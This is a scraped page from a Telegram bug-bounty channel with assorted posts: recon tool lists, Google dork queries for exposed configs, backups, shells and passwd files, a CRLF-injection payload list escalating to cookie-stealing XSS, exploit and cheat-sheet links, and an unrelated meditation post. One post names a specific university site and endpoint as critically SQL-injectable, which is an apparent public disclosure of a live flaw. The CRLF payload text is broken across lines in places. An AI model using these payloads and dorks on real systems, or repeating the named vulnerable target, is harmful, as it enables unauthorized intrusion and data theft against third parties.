bugbounty_tech | Unsorted

Telegram-канал bugbounty_tech - Bug bounty Tips

2246

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Subscribe to a channel

Bug bounty Tips

Small update on the upcoming video

I will upload it soon😌

Читать полностью…

Bug bounty Tips

I was Meditating for Ideas And This Popped up

" The Thoughts From Universe"

Idk We will call It whatever
Coz I am not familiar with this concept

Says That


Universe Live At Harmony at Neutral state(=) and That's the Refresh point

But Grows and Falls on charge state ( - or +)
Means At charged State It Grows

Eg - Success and Failure

And In Charge state
Both comes in one Hand

If There success then Failure Will be must And
Both success and Failure will try to be of Equal charge

Eg - 10 wins Means Mostly You will get 10 Failure too After the Wins

But At fall state You can Neutralise It by Wins Or Something Polar opposite to That
To Refresh the starting point

Like If You Are Having Intense Cravings about Something
Then Then Think Painful thoughts about that Addiction

Then Thing will neutralise


I Just Wrote this down
Coz I found this interesting
And It's A Thought from somewhere in Universe

I know it sounds lots like Yapping
But I would take it seriously

- Aijak Ofc

Читать полностью…

Bug bounty Tips

Bug-Bounty notes

>💛Welcome to the Future of Cybersecurity
>Overview
👣OSINT
ℹ️Recon Tips
>✳️Mastering the Art of Writing Clear and Effective Vulnerabilities Report
>Twitter
🌆Subdomain Enumeration
>Tools
🔑Nmap's NSE Scripts for Ethical Password Testing
👻Cheat-sheet's
>Exploitation

Link 🔗:-
Https://book.cipherops.xyz

Author: @laazy_hack3r

@GitBook_s

Читать полностью…

Bug bounty Tips

LFI | RFI | Traversal Cheat Sheet 🔰

🔖#infosec #cybersecurity #hacking #pentesting #security

Читать полностью…

Bug bounty Tips

#Cyber_Education
Using SeTcbPrivilege for educational purposes
https://github.com/daem0nc0re/PrivFu/tree/main/PowerOfTcb

Читать полностью…

Bug bounty Tips

# Google Dorks Cli
# https://github.com/six2dez/degoogle_hunter
degoogle_hunter.sh company.com

# Google dorks helper
https://dorks.faisalahmed.me/

# Code share sites
site:http://ideone.com | site:http://codebeautify.org | site:http://codeshare.io | site:http://codepen.io | site:http://repl.it | site:http://jsfiddle.net "company"
# GitLab/GitHub/Bitbucket
site:github.com | site:gitlab.com | site:bitbucket.org "company"
# Stackoverflow
site:stackoverflow.com "target.com"
# Project management sites
site:http://trello.com | site:*.atlassian.net "company"
# Pastebin-like sites
site:http://justpaste.it | site:http://pastebin.com "company"
# Config files
site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:env | ext:ini
# Database files
site:target.com ext:sql | ext:dbf | ext:mdb
# Backup files
site:target.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
# .git folder
inurl:"/.git" target.com -github
# Exposed documents
site:target.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
# Other files
site:target.com intitle:index.of | ext:log | ext:php intitle:phpinfo "published by the PHP Group" | inurl:shell | inurl:backdoor | inurl:wso | inurl:cmd | shadow | passwd | boot.ini | inurl:backdoor | inurl:readme | inurl:license | inurl:install | inurl:setup | inurl:config | inurl:"/phpinfo.php" | inurl:".htaccess" | ext:swf
# SQL errors
site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
# PHP errors
site:target.com "PHP Parse error" | "PHP Warning" | "PHP Error"
# Login pages
site:target.com inurl:signup | inurl:register | intitle:Signup
# Open redirects
site:target.com inurl:redir | inurl:url | inurl:redirect | inurl:return | inurl:src=http | inurl:r=http
# Apache Struts RCE
site:target.com ext:action | ext:struts | ext:do
# Search in pastebin
site:pastebin.com target.com
# Linkedin employees
site:linkedin.com employees target.com
# Wordpress files
site:target.com inurl:wp-content | inurl:wp-includes
# Subdomains
site:*.target.com
# Sub-subdomains
site:*.*.target.com
#Find S3 Buckets
site:.s3.amazonaws.com | site:http://storage.googleapis.com | site:http://amazonaws.com "target"
# Traefik
intitle:traefik inurl:8080/dashboard "target"
# Jenkins
intitle:"Dashboard [Jenkins]"

Читать полностью…

Bug bounty Tips

⚡️⚡️⚡️Bug Bounty Tip⚡️⚡️⚡️

🤡🤡New Google Dork: Have You Checked Linktr.ee?

🔼🔽It seems that many users unknowingly store confidential documents and access information on Linktr.ee.

💸💸💸Try using this dork:

site: linktr.ee + keyword


🫦🫦If something valuable is found and a bounty is scored, consider sharing the success! 😉

Читать полностью…

Bug bounty Tips

## CRLF Injection || HTTP Response Splitting

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;


Header-based test, site root

%
0d%0aheader:header
%0
aheader:header
%
0d
header:header
%2
3%
0dheader:header
%3f
%0
dheader:header

/%2
50a
header:header

/%25
250
aheader:header

/%%0a
0ah
eader:header

/%3f%0
dhe
ader:header

/%23%0d
hea
der:header

/%25%30a
hea
der:header

/%25%30%6
1he
ader:header

/%u000ahea
der
:header

CRLF chaine
d with Open Redirect server misconfiguration

_Note:_ This
sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)

//www.google.c
om/%2f%2e%2e%0d%0aheader:header
/www.google.c
om
/%2e%2e%2f%0d%0aheader:header
/google.com/%2
F.
.%0d%0aheader:header

Twitter specif
ic CRLF by @filedescriptor

%E5%98%8A%E5%98%8
Dheader:header

CRLF Injection
to XSS

%0d%0aContent-Le
ng
th:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

Response splitti
ng on 302 Redirect, before Location header (Discovered in DoD)

%0d%0aContent-Type:
%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E

Response splittin
g on 301 code, chained with Open Redirect to corrupt location header and to break 301 by @black2fan (Facebook bug)

_No
te:_ xxx:1 was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.

%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr

Читать полностью…

Bug bounty Tips

Sql Injection

HOST: cutm.ac.in
ENDPOINT: https://cutm.ac.in/payu/skill/index.php?id=1
SEVERITY: Critical
IMPACT: Critical

Читать полностью…

Bug bounty Tips

Hey Hackers !

PentestList is a fantastic resource for the cybersecurity and ethical hacking community!

Key Features of PentestList 🌟:

• Comprehensive Directory 📂
• Search & Filter 🔍
• Verified Listings ✅
• User Reviews & Ratings ⭐️
• Up-to-Date Information 🕒
• Easy Comparison ⚖️
• Resource Hub 🛠

PentestList is designed to be your go-to resource for finding the best penetration testing services and staying ahead in the cybersecurity world!

Go : https://pentestlist.com/

Читать полностью…

Bug bounty Tips

Starting with API testing

Читать полностью…

Bug bounty Tips

something is coming up guys,
check this out and let me know your thoughts

Читать полностью…

Bug bounty Tips

🔰 Updated Bug Bounty tool List!

dnscan https://github.com/rbsec/dnscan

Knockpy https://github.com/guelfoweb/knock

Sublist3r https://github.com/aboul3la/Sublist3r

massdns https://github.com/blechschmidt/massdns

nmap https://nmap.org

masscan https://github.com/robertdavidgraham/masscan

EyeWitness https://github.com/ChrisTruncer/EyeWitness

DirBuster https://sourceforge.net/projects/dirbuster/

dirsearch https://github.com/maurosoria/dirsearch

Gitrob https://github.com/michenriksen/gitrob

git-secrets https://github.com/awslabs/git-secrets

sandcastle https://github.com/yasinS/sandcastle

bucket_finder https://digi.ninja/projects/bucket_finder.php

GoogD0rker https://github.com/ZephrFish/GoogD0rker/

Wayback Machine https://web.archive.org

waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050

Sn1per https://github.com/1N3/Sn1per/

XRay https://github.com/evilsocket/xray

wfuzz https://github.com/xmendez/wfuzz/

patator https://github.com/lanjelot/patator

datasploit https://github.com/DataSploit/datasploit

hydra https://github.com/vanhauser-thc/thc-hydra

changeme https://github.com/ztgrace/changeme

MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/

Apktool https://github.com/iBotPeaches/Apktool

dex2jar https://sourceforge.net/projects/dex2jar/

sqlmap http://sqlmap.org/

oxml_xxe https://github.com/BuffaloWill/oxml_xxe/

XXE Injector https://github.com/enjoiz/XXEinjector

The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool

ground-control https://github.com/jobertabma/ground-control

ssrfDetector https://github.com/JacobReynolds/ssrfDetector

LFISuit https://github.com/D35m0nd142/LFISuite

GitTools https://github.com/internetwache/GitTools

dvcs-ripper https://github.com/kost/dvcs-ripper

tko-subs https://github.com/anshumanbh/tko-subs

HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer

Race the Web https://github.com/insp3ctre/race-the-web

ysoserial https://github.com/GoSecure/ysoserial

PHPGGC https://github.com/ambionics/phpggc

CORStest https://github.com/RUB-NDS/CORStest

Retire-js https://github.com/RetireJS/retire.js

getsploit https://github.com/vulnersCom/getsploit

Findsploit https://github.com/1N3/Findsploit

bfac https://github.com/mazen160/bfac

WPScan https://wpscan.org/

CMSMap https://github.com/Dionach/CMSmap

Amass https://github.com/OWASP/Amass

Extra Tools
http://projectdiscovery.io

Читать полностью…

Bug bounty Tips

/channel/boost/bugbounty_tech

Читать полностью…

Bug bounty Tips

Add 'app/config/config.local.neon' to the wordlist, and maybe you will get juicy data.

By:
@NoRed0x

#bugbountytips #bugbountytip

Читать полностью…

Bug bounty Tips

OSI Model
____ __ _

The OSI (Open Systems Interconnection) model is a conceptual framework used to understand and standardize the functions of a networking system. It divides the process of communication in a network into seven distinct layers, each responsible for different aspects of data transmission.

The Seven Layers:

1️⃣Physical Layer (Layer 1): Deals with the physical connection between devices, including cables, switches, and the transmission of raw binary data.

2️⃣Data Link Layer (Layer 2): Manages the data frames between two directly connected nodes and handles error detection and correction.

3️⃣Network Layer (Layer 3): Responsible for logical addressing and routing, ensuring that data packets are sent from the source to the destination across multiple networks.

4️⃣Transport Layer (Layer 4): Provides end-to-end communication, error recovery, and flow control between devices, often using protocols like TCP and UDP.

5️⃣Session Layer (Layer 5): Manages sessions or connections between applications, establishing, maintaining, and terminating communication.

6️⃣Presentation Layer (Layer 6): Translates data between the application layer and the network, handling data encryption, compression, and conversion.

7️⃣Application Layer (Layer 7): Interfaces directly with the end user, providing network services such as email, file transfer, and web browsing.

Читать полностью…

Bug bounty Tips

Video coming soon guys

Give a lot of reaction to this

Читать полностью…

Bug bounty Tips

Cross Site Scripting Mindmap

Читать полностью…

Bug bounty Tips

#Tech_book
#cryptography
"Cryptography and Embedded Systems Security", 2024.

Читать полностью…

Bug bounty Tips

#exploit
"Find and exploit race condition bugs in modern JS engines".

Читать полностью…

Bug bounty Tips

SQL Injection Cheat Sheet 💉

🔖#infosec #cybersecurity #hacking #pentesting #security #sqli

Читать полностью…

Bug bounty Tips

Tool alert🚨👇

Steps to install autoip changer tool
.
.
✔️ Share It with Your Friends.
🔗 CHECKOUT THE LINK IN BIO
🔥 Don’t miss the HIGHLIGHTS
🤔 Any queries? Don’t hesitate to DM.
❤️ LIKE, COMMENT, SHARE and SAVE the post.

#RedTeam #InfoSec #CyberSecurity #EthicalHacking #KaliLinux #CyberSec #HackerLife #PenTesting

https://www.instagram.com/cipherops.tech/p/C-j99vdSeV5/?igsh=MTc4MmM1YmI2Ng==

Читать полностью…

Bug bounty Tips

How Hackers Perform Device Scans on a Network with Nmap

Posted by @TheGodEye

Читать полностью…

Bug bounty Tips

☄️Want to learn how to hack? First, you'll need to get a good grip on these basics:

✔️Networking: Figure out how computers talk to each other.
✔️Coding: Learn to build and break stuff with code.
✔️Linux: Master this operating system – it's a hacker's playground.

🛡The better you understand these, the faster you'll pick up hacking skills.

Читать полностью…

Bug bounty Tips

https://github.com/chrislockard/api_wordlist

Читать полностью…

Bug bounty Tips

Plaaning to do something in 2024

## Advanced Recon

- Advanced Recon
- Sniffing HTTP and HTTPS
- MITM

## Dorking

- SQL Injection
- XSS
- HTML Injection

## Pen Testing Tools and Techniques

- Burpsuite and Tools
- SSH Enumeration and Brute Forcing
- Buffer Overflow
- Active Directory Enumeration
- S3 Bucket Enumeration and Exploitation and more

Читать полностью…

Bug bounty Tips

⚠️New BBP Target⚠️
🚀https://security.embracecloud.nl/.well-known/security.txt

Читать полностью…

Bug bounty Tips

https://www.acfcs.org/acfcs-contributor-report-bitcoin-tracking-for-law-enforcement

Читать полностью…

Bug bounty Tips

malvinval/ssrf-to-server-takeover-poc-bug-bounty-writeup-82d6715e333d" rel="nofollow">https://medium.com/@malvinval/ssrf-to-server-takeover-poc-bug-bounty-writeup-82d6715e333d

Читать полностью…

Bug bounty Tips

https://x.com/Rhynorater/status/1699395452481769867?t=2qXY5Fp_LUUzf-S0Vxb5fA&amp;s=35

Читать полностью…
Subscribe to a channel